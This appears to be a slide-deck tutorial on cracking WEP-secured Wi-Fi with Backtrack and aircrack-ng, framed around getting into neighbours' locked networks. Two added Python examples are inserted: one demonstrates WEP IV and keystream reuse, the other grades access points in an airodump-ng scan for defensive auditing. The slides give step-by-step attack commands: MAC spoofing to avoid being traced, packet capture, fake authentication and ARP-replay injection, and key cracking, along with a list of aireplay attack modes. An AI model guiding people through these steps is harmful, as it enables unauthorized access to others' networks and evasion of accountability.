Chances are you have a Wi-Fi network at home, or live close to one (or more) that tantalizingly pops up in a list whenever you boot up the laptop.
The problem is, if there's a lock next to the network name (AKA the SSID, or service set identifier), that indicates security is activated. Without the password or passphrase, you're not going to get access to that network, or the sweet, sweet internet that goes with it.
2. WHAT is Wi-Fi?
Stands for Wireless Fidelity
Uses the 2.4 – 5 GHz band of the frequency spectrum
Allows data to be exchanged WIRELESSLY
Uses radio waves
Defined as “WLAN products that are based on the IEEE 802.11 standards”
In 2004, Mysore became India's first Wi-Fi-enabled city and second in the world after Jerusalem.
3. Advantages
Cheaper
Less complexity (mainly caused due to wires)
Fast Connectivity
Secure with new WPA2 method
4. Disadvantages
Requires a Wi-Fi adapter (obviously)
Slower data transfer when the signal is weak
Obstructions may cause disconnections
WEP passcode is easily CRACKABLE!
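To see why the last disadvantage holds, here is an added example in Python that is not from the original slides. It computes the birthday-bound probability that WEP's 24-bit IV repeats within a given number of frames, and uses a small RC4 implementation to show that two frames encrypted under the same IV leak the XOR of their plaintexts to anyone listening. The shared key, IV and payloads are constructed for the demonstration, and the CRC-32 integrity value that real WEP appends is left out because it does not affect the point.

```python
import math

IV_BITS = 24                    # WEP sends a 24-bit IV in the clear with every frame
WEP_KEY = b"K3y!!"              # constructed 40-bit shared key for this example only


def iv_reuse_probability(n_frames: int, iv_bits: int = IV_BITS) -> float:
    """Birthday bound: P(at least one repeated IV) among n_frames randomly chosen IVs."""
    space = 1 << iv_bits
    if n_frames > space:
        return 1.0
    # log P(no collision) = sum_i ln(1 - i/space); log1p stays accurate for tiny i/space
    log_no_collision = sum(math.log1p(-i / space) for i in range(n_frames))
    return 1.0 - math.exp(log_no_collision)


def expected_frames_to_first_reuse(iv_bits: int = IV_BITS) -> float:
    """Mean number of random IVs drawn before the first repeat: sqrt(pi * N / 2), N = 2**iv_bits."""
    return math.sqrt(math.pi * (1 << iv_bits) / 2)


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4 (KSA + PRGA); WEP runs it with the per-frame key IV || shared_key."""
    s = list(range(256))
    j = 0
    for i in range(256):                           # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):                        # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(shared_key: bytes, iv: bytes, payload: bytes) -> bytes:
    """WEP-style frame body: cleartext IV followed by RC4(IV || key) XOR payload.
    The CRC-32 integrity value of real WEP is omitted here."""
    if len(iv) != 3:
        raise ValueError("WEP IV is 3 bytes")
    return iv + xor_bytes(payload, rc4_keystream(iv + shared_key, len(payload)))


def keystream_reuse_leak(shared_key: bytes, iv: bytes, p1: bytes, p2: bytes) -> bool:
    """Two frames under the same IV share a keystream, so c1 XOR c2 == p1 XOR p2:
    an eavesdropper learns the XOR of the plaintexts without knowing the key."""
    c1 = wep_encrypt(shared_key, iv, p1)[3:]      # drop the cleartext IV
    c2 = wep_encrypt(shared_key, iv, p2)[3:]
    return xor_bytes(c1, c2) == xor_bytes(p1, p2)


if __name__ == "__main__":
    print(f"expected frames before first IV repeat: {expected_frames_to_first_reuse():.0f}")
    for n in (1_000, 5_000, 10_000, 50_000):
        print(f"{n:>6} frames -> P(IV reuse) = {iv_reuse_probability(n):.3f}")
    iv = b"\x01\x02\x03"                           # constructed IV
    print("same IV leaks p1 XOR p2:",
          keystream_reuse_leak(WEP_KEY, iv, b"GET /index.html", b"GET /login.html"))
```

With around 10,000 frames the reuse probability is already about 95%, and the expected number of frames before the first repeat is roughly 5,100, so a busy network exhausts its safety margin in minutes; this is one of the structural flaws behind the slide's claim. WPA2's CCMP replaces RC4 with AES and a 48-bit packet number that never repeats under one key, which is the fix a defender should apply.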
5. Wi-Fi is called the “802.11 Standard”
Flavors of 802.11:
802.11a operates on the 5 GHz spectrum, providing a speed of 20 Mbps
802.11b operates on the 2.4 GHz spectrum, providing a speed of 11.4 Mbps
802.11g operates on the 2.4 GHz spectrum, providing blazingly fast speeds
802.11n is a new technology
6. Do YoU KnOw !?
Prerequisites:
1. Compatible wireless adapter
2. Backtrack 3 or above (USB boot or Live CD)
3. WEP-enabled Wi-Fi network
4. Knowledge of channel, BSSID, ESSID and MAC address
7. LeTs GeT cRaCkInG!
1. To crack the WEP key, first boot into Backtrack in Text Mode or Default Mode, then load the GUI using “startx”.
2. One important thing is to know which adapter your laptop has and whether it is capable of injecting packets. So we use airmon-ng to list all the interfaces.
8. KeEp It CoMiNg …
3. Now first we stop the interface we want to use, using airmon-ng stop (intf).
4. To make sure the interface is down, use ifconfig (intf) down.
5. Now, to avoid being traced back, we fake our MAC address using macchanger --mac (hex) (intf).
9. FaStEr NoW … C’mOn
6. Now we finally start the interface using airmon-ng start (intf).
7. Now it's time to find the network and exploit it, so use airodump-ng (intf) to find the BSSID (Basic Service Set Identifier) and channel of the network.
8. Now, with the following command, we capture the traffic on the network and use that traffic to crack the WEP key: airodump-ng (intf) -c (ch) -w (intf) --bssid (bssid)
10. YoU’rE NeArLy DoNe !
9. [In a NEW CONSOLE] Here we artificially increase the traffic by sending junk data over the network and forcing the router to reply; with the help of that, we try to break the WEP key: aireplay-ng -1 0 -a (bssid) -h (mac) -e (essid) (intf) and then aireplay-ng -3 -b (bssid) -h (mac) (intf)
10. Now wait patiently till the #Data count goes above 10K (recommended).
11. SuCcEsSfUl??!
11. Use ls to list the files on the desktop, which are the files where the captured traffic is being logged.
12. Now finally use aircrack-ng to crack the WEP key from the captured IVs: aircrack-ng -b (bssid) Wifi-01.cap
Now, to understand the commands, here is the extra information -> Next Slide :D
12. aireplay-ng <options> <replay interface>
Filter options:
-b bssid : MAC address, Access Point
-d dmac : MAC address, Destination
-s smac : MAC address, Source
-m len : minimum packet length
-n len : maximum packet length
-u type : frame control, type field
-v subt : frame control, subtype field
-t tods : frame control, To DS bit
-f fromds : frame control, From DS bit
-w iswep : frame control, WEP bit
Attack modes:
-0 : deauthenticate 1 or all stations
-1 : fake authentication with AP
-2 : interactive frame selection
-3 : standard ARP-request replay
-4 : decrypt/chopchop WEP packet
-5 : generates valid keystream
-9 : injection test
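The airodump-ng scan from steps 7 and 8 writes, with -w, a CSV file next to the .cap capture, and that file is exactly what a network owner uses to audit their own site for the weak settings these slides describe. The following Python example is added here and is not part of the original slides: it parses a constructed airodump-ng CSV and grades each access point by its Privacy and Cipher columns, so that WEP, open and TKIP networks under your administration can be found and moved to WPA2/WPA3 with CCMP. The column layout is assumed from airodump-ng's CSV output; every BSSID, station address and network name in the sample is made up.

```python
import csv
from typing import Dict, List

# Constructed sample in the layout of an airodump-ng "<prefix>-01.csv" file.
# The column order is assumed from the tool's CSV output; every address and
# network name below is made up for this example.
SAMPLE_CSV = """
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:01, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6,  54, WEP, WEP, , -40, 120, 3000, 0.  0.  0.  0, 12, Warehouse-AP, 
00:11:22:33:44:02, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 11,  54, WPA2, CCMP, PSK, -55, 98, 0, 0.  0.  0.  0, 9, Office-AP, 
00:11:22:33:44:03, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  1,  54, OPN, , , -70, 30, 0, 0.  0.  0.  0, 5, Guest, 
00:11:22:33:44:04, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6,  54, WPA2 WPA, CCMP TKIP, PSK, -62, 77, 0, 0.  0.  0.  0, 6, Legacy, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
aa:bb:cc:dd:ee:01, 2024-01-01 10:01:00, 2024-01-01 10:04:00, -50, 40, 00:11:22:33:44:01, 
"""

RISK_ORDER = {"critical": 0, "high": 1, "medium": 2, "ok": 3}


def parse_airodump_csv(text: str) -> List[Dict]:
    """Return the access-point rows of an airodump-ng CSV as dicts (the station table is skipped)."""
    aps, header = [], None
    for line in text.splitlines():
        if not line.strip():
            if header is not None:
                break                      # blank line ends the AP table; stations follow
            continue
        fields = [f.strip() for f in next(csv.reader([line], skipinitialspace=True))]
        if header is None:
            if fields[0] == "BSSID":
                header = fields
            continue
        if len(fields) < len(header):
            continue                       # truncated row (file still being written)
        row = dict(zip(header, fields))
        aps.append({
            "bssid": row["BSSID"],
            "essid": row["ESSID"],
            "channel": int(row["channel"]),
            "privacy": row["Privacy"].split(),   # e.g. ["WPA2", "WPA"] when both are offered
            "cipher": row["Cipher"].split(),
            "iv_count": int(row["# IV"] or 0),
        })
    return aps


def grade(ap: Dict) -> Dict:
    """Map an AP's advertised security to a risk level and the remediation a defender wants."""
    privacy, cipher = ap["privacy"], ap["cipher"]
    if "WEP" in privacy:
        risk = "critical"
        action = "WEP (RC4, 24-bit IV): key recoverable from captured traffic; replace with WPA2/WPA3 CCMP"
    elif "OPN" in privacy:
        risk = "high"
        action = "Open network: all traffic unencrypted; enable WPA2/WPA3 or isolate it as untrusted"
    elif "TKIP" in cipher or "WPA" in privacy:
        risk = "medium"
        action = "WPA/TKIP still offered: disable TKIP and WPA1 compatibility, keep CCMP only"
    else:
        risk = "ok"
        action = "WPA2/WPA3 with CCMP"
    return {**ap, "risk": risk, "action": action}


def audit(aps: List[Dict]) -> List[Dict]:
    """Grade every AP and return them worst-first."""
    return sorted((grade(ap) for ap in aps), key=lambda f: RISK_ORDER[f["risk"]])


def report(findings: List[Dict]) -> str:
    """Plain-text summary, one line per AP."""
    return "\n".join(
        f"[{f['risk']:>8}] {f['essid']:<14} {f['bssid']} ch{f['channel']:<2} "
        f"{' '.join(f['privacy']) or '-'}: {f['action']}"
        for f in findings
    )


if __name__ == "__main__":
    print(report(audit(parse_airodump_csv(SAMPLE_CSV))))
```

Run it against a real "<prefix>-01.csv" by reading the file into parse_airodump_csv instead of SAMPLE_CSV. The "# IV" column is kept in each finding because a WEP network that has already emitted thousands of IVs during a short scan is the one to migrate first.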